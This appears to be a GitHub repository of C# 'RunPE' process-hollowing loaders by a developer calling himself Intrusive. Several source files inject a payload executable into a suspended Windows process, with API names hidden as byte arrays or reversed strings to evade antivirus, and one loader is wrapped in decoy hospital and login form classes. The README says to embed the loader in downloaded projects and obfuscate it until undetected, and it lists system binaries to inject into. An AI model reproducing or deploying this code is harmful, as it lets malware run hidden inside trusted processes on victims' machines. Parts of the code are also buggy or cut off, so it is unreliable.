├── All Bypass AV For My Best Runpe.cs ├── README.md ├── Runpe.cs ├── Runpe2.cs └── Stub.cs /All Bypass AV For My Best Runpe.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Text; 5 | using System.Windows.Forms; 6 | using Microsoft.VisualBasic; // Install-Package Microsoft.VisualBasic 7 | using Microsoft.VisualBasic.CompilerServices; // Install-Package Microsoft.VisualBasic 8 | 9 | 10 | public partial class RegisterScreen : Form 11 | { 12 | bool adYazdiMi = false; 13 | bool soyadYazdiMi = false; 14 | bool kullaniciAdiYazdiMi = false; 15 | bool sifreYazdiMi = false; 16 | LoginScreen loginScreen; 17 | public RegisterScreen(LoginScreen loginScreen) 18 | { 19 | this.loginScreen = loginScreen; 20 | InitializeComponent(); 21 | } 22 | 23 | private void InitializeComponent() 24 | { 25 | throw new NotImplementedException(); 26 | } 27 | 28 | public class Kullanici 29 | { 30 | public Kullanici(int kullaniciId, string kullaniciAdi, string sifre, byte yetki) 31 | { 32 | this.kullaniciId = kullaniciId; 33 | this.kullaniciAdi = kullaniciAdi; 34 | this.sifre = sifre; 35 | this.yetki = yetki; 36 | } 37 | 38 | private int kullaniciId; 39 | private string kullaniciAdi; 40 | private string sifre; 41 | private byte yetki; 42 | private int sexxx; 43 | 44 | public int KullaniciID 45 | { 46 | get 47 | { 48 | return kullaniciId; 49 | } 50 | set 51 | { 52 | kullaniciId = value; 53 | } 54 | } 55 | 56 | public string KullaniciAdi 57 | { 58 | get 59 | { 60 | return kullaniciAdi; 61 | } 62 | set 63 | { 64 | kullaniciAdi = value; 65 | } 66 | } 67 | 68 | public string Sifre 69 | { 70 | get 71 | { 72 | return sifre; 73 | } 74 | set 75 | { 76 | sifre = value; 77 | } 78 | } 79 | 80 | public byte Yetki 81 | { 82 | get 83 | { 84 | return yetki; 85 | } 86 | set 87 | { 88 | yetki = value; 89 | } 90 | } 91 | } 92 | } 93 | 94 | public class LoginScreen 95 | { 96 | } 97 | 98 | namespace yarak 99 | { 100 | public static class klass 101 | { 102 | private static string kernel32 = BytesToStr(new byte[] { 107, 101, 114, 110, 101, 108, 51, 50 }); 103 | private static string LoadLibraryA = BytesToStr(new byte[] { 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 65 }); 104 | 105 | private delegate IntPtr LoadLibraryAParameters(string name); 106 | 107 | private static readonly LoadLibraryAParameters LoadLibrary = CreateApi(kernel32, LoadLibraryA); 108 | 109 | private static DelegateInstance CreateApi(string name, string method) 110 | { 111 | return (DelegateInstance)(object)Marshal.GetDelegateForFunctionPointer((IntPtr)GetProcAddress((long)GetInternalModuleBaseAddr(name), method), typeof(DelegateInstance)); 112 | } 113 | 114 | private static IntPtr GetInternalModuleBaseAddr(string ModuleName) 115 | { 116 | if (ModuleName.Contains(".dll") == false) 117 | ModuleName = ModuleName + ".dll"; 118 | IntPtr ModuleBaseAddress = default; 119 | foreach (ProcessModule ProcessModule in Process.GetCurrentProcess().Modules) 120 | { 121 | if ((ProcessModule.ModuleName.ToLower() ?? "") == (ModuleName ?? "")) 122 | return ProcessModule.BaseAddress; 123 | } 124 | 125 | return LoadLibrary(ModuleName); 126 | } 127 | 128 | private static byte[] ReadByteArray(IntPtr Address, int Size) 129 | { 130 | var ReturnArray = new byte[Size]; 131 | Marshal.Copy(Address, ReturnArray, 0, Size); 132 | return ReturnArray; 133 | } 134 | 135 | private static long GetProcAddress(long ModuleAddress, string Export) 136 | { 137 | byte[] IExportDir = null; 138 | if (IntPtr.Size == 4) 139 | IExportDir = ReadByteArray((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + 0x3CL)) + 0x78L)) + 24L), 16); 140 | if (IntPtr.Size == 8) 141 | IExportDir = ReadByteArray((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + Marshal.ReadInt32((IntPtr)(ModuleAddress + 0x3CL)) + 0x88L)) + 24L), 16); 142 | for (int i = 0, loopTo = BitConverter.ToInt32(IExportDir, 0); i <= loopTo; i += 1) 143 | { 144 | int tpAddress = Marshal.ReadInt32((IntPtr)(BitConverter.ToInt32(IExportDir, 8) + ModuleAddress + i * 4)); 145 | string ApiString = Encoding.ASCII.GetString(ReadByteArray((IntPtr)(ModuleAddress + tpAddress), 64)).Split(Convert.ToChar(Constants.vbNullChar))[0]; 146 | int Ord = BitConverter.ToInt16(ReadByteArray((IntPtr)(BitConverter.ToInt32(IExportDir, 12) + ModuleAddress + i * 2), 2), 0); 147 | if ((ApiString ?? "") == (Export ?? "")) 148 | return BitConverter.ToInt32(ReadByteArray((IntPtr)(BitConverter.ToInt32(IExportDir, 4) + ModuleAddress + Ord * 4), 4), 0) + ModuleAddress; 149 | } 150 | 151 | return default; 152 | } 153 | 154 | private delegate bool CP(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref STARTUP_INFORMATION startupInfo, ref PROCESS_INFORMATION processInformation); 155 | 156 | private delegate bool GTC(IntPtr thread, int[] context); 157 | 158 | private delegate bool W64GTC(IntPtr thread, int[] context); 159 | 160 | private delegate bool STC(IntPtr thread, int[] context); 161 | 162 | private delegate bool W64STC(IntPtr thread, int[] context); 163 | 164 | private delegate bool RPM(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 165 | 166 | private delegate bool WPM(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 167 | 168 | private delegate int NTU(IntPtr process, int baseAddress); 169 | 170 | private delegate int VAE(IntPtr handle, int address, int length, int type, int protect); 171 | 172 | private delegate int RT(IntPtr handle); 173 | 174 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 175 | private partial struct PROCESS_INFORMATION 176 | { 177 | public IntPtr ProcessHandle; 178 | public IntPtr ThreadHandle; 179 | public uint ProcessId; 180 | public uint ThreadId; 181 | } 182 | 183 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 184 | private partial struct STARTUP_INFORMATION 185 | { 186 | public uint Size; 187 | public string Reserved1; 188 | public string Desktop; 189 | public string Title; 190 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] 191 | public byte[] Misc; 192 | public IntPtr Reserved2; 193 | public IntPtr StdInput; 194 | public IntPtr StdOutput; 195 | public IntPtr StdError; 196 | } 197 | 198 | private static bool HandleRun(string path, string cmd, byte[] data, bool compatible) 199 | { 200 | 201 | // Step 3 202 | // We retrieve the name of the API we are going to have to call, this method was used for bypass some AV some years ago 203 | string K32 = BytesToStr(new byte[] { 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108 }); // Kernel32.dll 204 | string NTD = BytesToStr(new byte[] { 110, 116, 100, 108, 108, 46, 100, 108, 108 }); // Ntdll.dll 205 | string CP = BytesToStr(new byte[] { 67, 114, 101, 97, 116, 101, 80, 114, 111, 99, 101, 115, 115, 65 }); // CreateProcess 206 | string GTC = BytesToStr(new byte[] { 71, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // GetThreadContext 207 | string STC = BytesToStr(new byte[] { 83, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // SetThreadContext 208 | string W64GTC = BytesToStr(new byte[] { 87, 111, 119, 54, 52, 71, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // Wow64GetThreadContext 209 | string W64STC = BytesToStr(new byte[] { 87, 111, 119, 54, 52, 83, 101, 116, 84, 104, 114, 101, 97, 100, 67, 111, 110, 116, 101, 120, 116 }); // Wow64SetThreadContext 210 | string RPM = BytesToStr(new byte[] { 82, 101, 97, 100, 80, 114, 111, 99, 101, 115, 115, 77, 101, 109, 111, 114, 121 }); // .... 211 | string WPM = BytesToStr(new byte[] { 87, 114, 105, 116, 101, 80, 114, 111, 99, 101, 115, 115, 77, 101, 109, 111, 114, 121 }); 212 | string NTU = BytesToStr(new byte[] { 78, 116, 85, 110, 109, 97, 112, 86, 105, 101, 119, 79, 102, 83, 101, 99, 116, 105, 111, 110 }); 213 | string VAE = BytesToStr(new byte[] { 86, 105, 114, 116, 117, 97, 108, 65, 108, 108, 111, 99, 69, 120 }); 214 | string RT = BytesToStr(new byte[] { 82, 101, 115, 117, 109, 101, 84, 104, 114, 101, 97, 100 }); 215 | 216 | // Step 4 217 | // Here, the API are resolved at runtime by a custom GetProcAdress 218 | var CreateProcess = CreateApi(K32, CP); 219 | var GetThreadContext = CreateApi(K32, GTC); 220 | var Wow64GetThreadContext = CreateApi(K32, W64GTC); 221 | var SetThreadContext = CreateApi(K32, STC); 222 | var Wow64SetThreadContext = CreateApi(K32, W64STC); 223 | var ReadProcessMemory = CreateApi(K32, RPM); 224 | var WriteProcessMemory = CreateApi(K32, WPM); 225 | var NtUnmapViewOfSection = CreateApi(NTD, NTU); 226 | var VirtualAllocEx = CreateApi(K32, VAE); 227 | var ResumeThread = CreateApi(K32, RT); 228 | var ReadWrite = default(int); 229 | string QuotedPath = string.Format("\"{0}\"", path); 230 | var SI = new STARTUP_INFORMATION(); 231 | var PI = new PROCESS_INFORMATION(); 232 | SI.Size = (uint)Marshal.SizeOf(typeof(STARTUP_INFORMATION)); 233 | try 234 | { 235 | if (!string.IsNullOrEmpty(cmd)) 236 | { 237 | QuotedPath = QuotedPath + " " + cmd; 238 | } 239 | 240 | // Step 5 : we create a suspended process where the payload will be injected 241 | if (!CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4U, IntPtr.Zero, null, ref SI, ref PI)) 242 | throw new Exception(); 243 | int FileAddress = BitConverter.ToInt32(data, 60); // We get the value of elf_new (used to find NtHeader) 244 | int ImageBase = BitConverter.ToInt32(data, FileAddress + 52); // We get the image base of our payload 245 | var Context = new int[179]; 246 | Context[0] = 65538; // Context FULL 247 | 248 | // Step 6 : We check if our process is x86 or x64 249 | // Then we get the context of the Suspended Process created earlier 250 | if (IntPtr.Size == 4) 251 | { 252 | if (!GetThreadContext(PI.ThreadHandle, Context)) 253 | throw new Exception(); 254 | } 255 | else if (!Wow64GetThreadContext(PI.ThreadHandle, Context)) 256 | throw new Exception(); 257 | int Ebx = Context[41]; 258 | var BaseAddress = default(int); 259 | 260 | // Step 7 : We get the baseAdress of the Suspended Process by reading is memory at the Ebx + 8 261 | if (!ReadProcessMemory(PI.ProcessHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite)) 262 | throw new Exception(); 263 | 264 | // Step 8 : If the ImageBase of our payload is the same as the Suspended Process we need to unmap it to map our payload 265 | if (ImageBase == BaseAddress) 266 | { 267 | if (!(NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) == 0)) 268 | throw new Exception(); 269 | } 270 | 271 | int SizeOfImage = BitConverter.ToInt32(data, FileAddress + 80); // Get the Size of our payload 272 | int SizeOfHeaders = BitConverter.ToInt32(data, FileAddress + 84); // Get the SizeHeader of our payload 273 | var AllowOverride = default(bool); 274 | 275 | // Step 9 : Create a buffer into the Suspended Process at the ImageBase of our payload 276 | int NewImageBase = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64); 277 | 278 | // This is the only way to execute under certain conditions. However, it may show 279 | // an application error probably because things aren't being relocated properly. 280 | if (!compatible && NewImageBase == 0) 281 | { 282 | AllowOverride = true; 283 | NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64); 284 | } 285 | 286 | if (NewImageBase == 0) 287 | throw new Exception(); 288 | 289 | // Step 10 : Now, we write the Header bytes of our payload in the region created in the Step 9 290 | if (!WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite)) 291 | throw new Exception(); 292 | int SectionOffset = FileAddress + 248; // Get the address of Sections Header 293 | short NumberOfSections = BitConverter.ToInt16(data, FileAddress + 6); // Get the number of sections 294 | 295 | // Step 11 : We write all sections in the region created previously 296 | // After this, our payload is corectly mapped in the suspended process 297 | for (int I = 0, loopTo = NumberOfSections - 1; I <= loopTo; I++) 298 | { 299 | int VirtualAddress = BitConverter.ToInt32(data, SectionOffset + 12); 300 | int SizeOfRawData = BitConverter.ToInt32(data, SectionOffset + 16); 301 | int PointerToRawData = BitConverter.ToInt32(data, SectionOffset + 20); 302 | if (!(SizeOfRawData == 0)) 303 | { 304 | var SectionData = new byte[SizeOfRawData]; 305 | Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length); 306 | if (!WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite)) 307 | throw new Exception(); 308 | } 309 | 310 | SectionOffset += 40; 311 | } 312 | 313 | var PointerData = BitConverter.GetBytes(NewImageBase); 314 | // Step 12 : We overwrite the BaseAddress of the PEB by the new ImageBase of our payload 315 | if (!WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ref ReadWrite)) 316 | throw new Exception(); 317 | int AddressOfEntryPoint = BitConverter.ToInt32(data, FileAddress + 40); 318 | if (AllowOverride) 319 | NewImageBase = ImageBase; 320 | 321 | // Step 13 : We update EAX by the entry Point of our payload 322 | Context[44] = NewImageBase + AddressOfEntryPoint; 323 | 324 | // Step 14 : Update the ContextThread 325 | if (IntPtr.Size == 4) 326 | { 327 | if (!SetThreadContext(PI.ThreadHandle, Context)) 328 | throw new Exception(); 329 | } 330 | else if (!Wow64SetThreadContext(PI.ThreadHandle, Context)) 331 | throw new Exception(); 332 | 333 | // Step 15 : Resume our suspended Process 334 | if (ResumeThread(PI.ThreadHandle) == -1) 335 | throw new Exception(); // spoted avast 336 | } 337 | catch 338 | { 339 | var P = Process.GetProcessById((int)PI.ProcessId); 340 | if (P is object) 341 | P.Kill(); 342 | return false; 343 | } 344 | 345 | return true; 346 | } 347 | 348 | public static bool Run(string path, string cmd, byte[] data, bool compatible) 349 | { 350 | for (int I = 1; I <= 5; I++) 351 | { 352 | if (HandleRun(path, cmd, data, compatible)) // Step 2 : We will try to run the RunPe 5 times in case of some error 353 | { 354 | } 355 | 356 | return true; 357 | } 358 | 359 | return false; 360 | } 361 | 362 | private static string BytesToStr(byte[] input) 363 | { 364 | return Encoding.Default.GetString(input); 365 | } 366 | } 367 | } 368 | 369 | 370 | public partial class TBLHastalar 371 | { 372 | public byte HastaID { get; set; } 373 | public string HastaAd { get; set; } 374 | public string HastaSoyad { get; set; } 375 | public string HastaTC { get; set; } 376 | public string HastaCinsiyet { get; set; } 377 | public string HastaDogumYeri { get; set; } 378 | public string HastaTelefon { get; set; } 379 | public string Poliklinik { get; set; } 380 | public string RandevuTarihi { get; set; } 381 | } 382 | 383 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Runpe-ProcessHollowing 2 | TR 3 | 4 | Fud Runpe Av Evasion 5 | 6 | Öncellikle Runpeyi Githubdan indirdiğimiz Otomasyon Form Game Tarzı Projelerin İçine Koyuyoruz 7 | 8 | daha Sora obfuscate Ettikten sora Undetected oluyor ondan sora kullanabilirsiniz 9 | 10 | Developer İntrusive 11 | ------------------- 12 | EN 13 | 14 | 15 | Fud Runpe Av Evasion 16 | 17 | First of all, we Put Runpey Into Automation Forms-Style Projects that we have downloaded from Github 18 | 19 | after you have obfuscated more Sora, you can use from it that sora is getting Undetected 20 | 21 | ------------------------------------------------------------- 22 | İnjection List Dotnet 23 | 24 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe 25 | 26 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe 27 | 28 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe 29 | 30 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe 31 | 32 | C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\CasPol.exe 33 | 34 | -------------------------------------------------------------------- 35 | İnjection List Native 36 | 37 | C:\\Windows\\System32\\svchost.exe 38 | 39 | C:\\Windows\\System32\\schtasks.exe 40 | 41 | C:\\Windows\\explorer.exe 42 | 43 | C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe 44 | 45 | ------------------------------------------------------------- 46 | -------------------------------------------------------------------------------- /Runpe.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using Microsoft.VisualBasic; 5 | 6 | namespace GIT 7 | { 8 | public class Kamikazi 9 | { 10 | public static Int16 ToInt16(byte[] value, int startIndex) 11 | { 12 | return (Int16)typeof(BitConverter).GetMethod("ToIn" + "t16").Invoke(null, new object[] { value, startIndex }); 13 | } 14 | public static Int32 ToInt32(byte[] value, int startIndex) 15 | { 16 | return (Int32)typeof(BitConverter).GetMethod("To" + "Int32").Invoke(null, new object[] { value, startIndex }); 17 | } 18 | public static byte[] GetBytes(int value) 19 | { 20 | System.Reflection.MethodInfo[] mi = typeof(BitConverter).GetMethods(); 21 | byte[] Result = new byte[] { }; 22 | for (int i = 0; i < mi.Length; i++) 23 | { 24 | if (mi[i].Name == "Get" + "Bytes") 25 | { 26 | if (mi[i].GetParameters()[0].ParameterType.Name == "In" + "t32") 27 | { 28 | Result = (byte[])mi[i].Invoke(null, new object[] { value }); 29 | } 30 | } 31 | } 32 | return Result; 33 | } 34 | 35 | public static string[] ReturnParams() 36 | { 37 | string KJ = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC"; 38 | return KJ.Split(new string[] { "[||]" }, StringSplitOptions.None); 39 | } 40 | #region API delegate 41 | private delegate int ResumeThread_Delegate(IntPtr handle); 42 | private delegate bool Wow64SetThreadContext_Delegate(IntPtr thread, int[] context); 43 | private delegate bool SetThreadContext_Delegate(IntPtr thread, int[] context); 44 | private delegate bool Wow64GetThreadContext_Delegate(IntPtr thread, int[] context); 45 | private delegate bool GetThreadContext_Delegate(IntPtr thread, int[] context); 46 | private delegate int VirtualAllocEx_Delegate(IntPtr handle, int address, int length, int type, int protect); 47 | private delegate bool WriteProcessMemory_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 48 | private delegate bool ReadProcessMemory_Delegate(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 49 | private delegate int ZwUnmapViewOfSection_Delegate(IntPtr process, int baseAddress); 50 | private delegate bool CreateProcessA_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, 51 | bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation); 52 | #endregion 53 | 54 | #region API 55 | private static readonly ResumeThread_Delegate ResumeThread = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[2])); 56 | private static readonly Wow64SetThreadContext_Delegate Wow64SetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[3])); 57 | private static readonly SetThreadContext_Delegate SetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[4])); 58 | private static readonly Wow64GetThreadContext_Delegate Wow64GetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[5])); 59 | private static readonly GetThreadContext_Delegate GetThreadContext = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[6])); 60 | private static readonly VirtualAllocEx_Delegate VirtualAllocEx = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[7])); 61 | private static readonly WriteProcessMemory_Delegate WriteProcessMemory = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[8])); 62 | private static readonly ReadProcessMemory_Delegate ReadProcessMemory = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[9])); 63 | private static readonly ZwUnmapViewOfSection_Delegate ZwUnmapViewOfSection = LoadApi(Strings.StrReverse(ReturnParams()[1]), Strings.StrReverse(ReturnParams()[10])); 64 | private static readonly CreateProcessA_Delegate CreateProcessA = LoadApi(Strings.StrReverse(ReturnParams()[0]), Strings.StrReverse(ReturnParams()[11])); 65 | #endregion 66 | 67 | 68 | #region CreateAPI 69 | [DllImport("kernel32", SetLastError = true)] 70 | private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); 71 | [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] 72 | private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name); 73 | private static CreateApi LoadApi(string name, string method) 74 | { 75 | return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)); 76 | } 77 | #endregion 78 | 79 | 80 | #region Structure 81 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 82 | private struct ProcessInformation 83 | { 84 | public readonly IntPtr ProcessHandle; 85 | public readonly IntPtr ThreadHandle; 86 | public readonly uint ProcessId; 87 | private readonly uint ThreadId; 88 | } 89 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 90 | private struct StartupInformation 91 | { 92 | public uint Size; 93 | private readonly string Reserved1; 94 | private readonly string Desktop; 95 | private readonly string Title; 96 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)] private readonly byte[] Misc; 97 | private readonly IntPtr Reserved2; 98 | private readonly IntPtr StdInput; 99 | private readonly IntPtr StdOutput; 100 | private readonly IntPtr StdError; 101 | } 102 | #endregion 103 | 104 | public static void Execute(string path, byte[] payload) 105 | { 106 | for (int i = 0; i < 5; i++) 107 | { 108 | int readWrite = 0; 109 | StartupInformation SI = new StartupInformation(); 110 | ProcessInformation PI = new ProcessInformation(); 111 | SI.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation))); 112 | try 113 | { 114 | bool CPA = CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref SI, ref PI); 115 | if (!CPA) 116 | { 117 | throw new Exception(); 118 | } 119 | int fileAddress = ToInt32(payload, 30 + 30); 120 | int imageBase = ToInt32(payload, fileAddress + 50 + 2); 121 | int[] context = new int[170 + 9]; 122 | context[0] = 65538; 123 | if (IntPtr.Size == 4) 124 | { if (!GetThreadContext(PI.ThreadHandle, context)) throw new Exception(); } 125 | else 126 | { if (!Wow64GetThreadContext(PI.ThreadHandle, context)) throw new Exception(); } 127 | int ebx = context[41]; 128 | int baseAddress = 0; 129 | if (!ReadProcessMemory(PI.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception(); 130 | if (imageBase == baseAddress) 131 | if (ZwUnmapViewOfSection(PI.ProcessHandle, baseAddress) != 0) throw new Exception(); 132 | int sizeOfImage = ToInt32(payload, fileAddress + 80); 133 | int sizeOfHeaders = ToInt32(payload, fileAddress + 84); 134 | bool allowOverride = false; 135 | int newImageBase = VirtualAllocEx(PI.ProcessHandle, imageBase, sizeOfImage, 12288, 64); 136 | 137 | if (newImageBase == 0) throw new Exception(); 138 | if (!WriteProcessMemory(PI.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception(); 139 | int sectionOffset = fileAddress + 248; 140 | short numberOfSections = ToInt16(payload, fileAddress + 6); 141 | for (int I = 0; I < numberOfSections; I++) 142 | { 143 | int virtualAddress = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 12 }); 144 | int sizeOfRawData = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 16 }); 145 | int pointerToRawData = (int)typeof(Kamikazi).GetMethod("ToInt32").Invoke(null, new object[] { payload, sectionOffset + 20 }); 146 | if (sizeOfRawData != 0) 147 | { 148 | byte[] sectionData = new byte[sizeOfRawData]; 149 | typeof(Buffer).GetMethod("BlockCopy").Invoke(null, new object[] { payload, pointerToRawData, sectionData, 0, sectionData.Length }); 150 | if (!WriteProcessMemory(PI.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception(); 151 | } 152 | sectionOffset += 40; 153 | } 154 | byte[] pointerData = GetBytes(newImageBase); 155 | if (!WriteProcessMemory(PI.ProcessHandle, ebx + 8, pointerData, 4, ref readWrite)) throw new Exception(); 156 | int addressOfEntryPoint = ToInt32(payload, fileAddress + 40); 157 | if (allowOverride) newImageBase = imageBase; 158 | context[44] = newImageBase + addressOfEntryPoint; 159 | 160 | if (IntPtr.Size == 4) 161 | { 162 | if (!SetThreadContext(PI.ThreadHandle, context)) throw new Exception(); 163 | } 164 | else 165 | { 166 | if (!Wow64SetThreadContext(PI.ThreadHandle, context)) throw new Exception(); 167 | } 168 | if (ResumeThread(PI.ThreadHandle) == -1) throw new Exception(); 169 | } 170 | catch 171 | { 172 | Process.GetProcessById(Convert.ToInt32(PI.ProcessId)).Kill(); 173 | continue; 174 | } 175 | break; 176 | } 177 | } 178 | } 179 | } -------------------------------------------------------------------------------- /Runpe2.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | //Developer İntrusive 8 | //Developer İntrusive 9 | //Developer İntrusive 10 | //Developer İntrusive 11 | //Developer İntrusive 12 | 13 | namespace intrusive 14 | { 15 | public static class ömer 16 | { 17 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)] 18 | [System.Security.SuppressUnmanagedCodeSecurity] 19 | private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref STARTUP_INFORMATION startupInfo, ref PROCESS_INFORMATION processInformation); 20 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")] 21 | [System.Security.SuppressUnmanagedCodeSecurity] 22 | private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context); 23 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")] 24 | [System.Security.SuppressUnmanagedCodeSecurity] 25 | private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context); 26 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")] 27 | [System.Security.SuppressUnmanagedCodeSecurity] 28 | private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context); 29 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")] 30 | [System.Security.SuppressUnmanagedCodeSecurity] 31 | private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context); 32 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")] 33 | [System.Security.SuppressUnmanagedCodeSecurity] 34 | private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead); 35 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")] 36 | [System.Security.SuppressUnmanagedCodeSecurity] 37 | private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten); 38 | [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")] 39 | [System.Security.SuppressUnmanagedCodeSecurity] 40 | private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress); 41 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")] 42 | [System.Security.SuppressUnmanagedCodeSecurity] 43 | private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect); 44 | [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")] 45 | [System.Security.SuppressUnmanagedCodeSecurity] 46 | private static extern int ResumeThread_API(System.IntPtr handle); 47 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)] 48 | private struct PROCESS_INFORMATION 49 | { 50 | public System.IntPtr HasanHandle; 51 | public System.IntPtr TihradHandle; 52 | public uint _processıd; 53 | public uint _threadıd; 54 | } // PROCESS_INFORMATION 55 | 56 | [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)] 57 | private struct STARTUP_INFORMATION 58 | { 59 | public uint Size_; 60 | public string _reversed1s_; 61 | public string _desktop_; 62 | public string _title_; 63 | 64 | public int dwX; 65 | public int dwY; 66 | public int dwXSize; 67 | public int dwYSize; 68 | public int dwXCountChars; 69 | public int dwYCountChars; 70 | public int dwFillAttribute; 71 | public int FLAGSS; 72 | public short wShowWindow; 73 | public short cbReserved2; 74 | public System.IntPtr Reserved2; 75 | public System.IntPtr StdInput; 76 | public System.IntPtr StdOutput; 77 | public System.IntPtr StdError; 78 | } 79 | 80 | public static bool Run(string path, string cmd, byte[] data, bool compatible) 81 | { 82 | for (int fri = 1; fri <= 5; fri++) 83 | { 84 | if (HandleRun(path, cmd, data, compatible)) 85 | return true; 86 | } 87 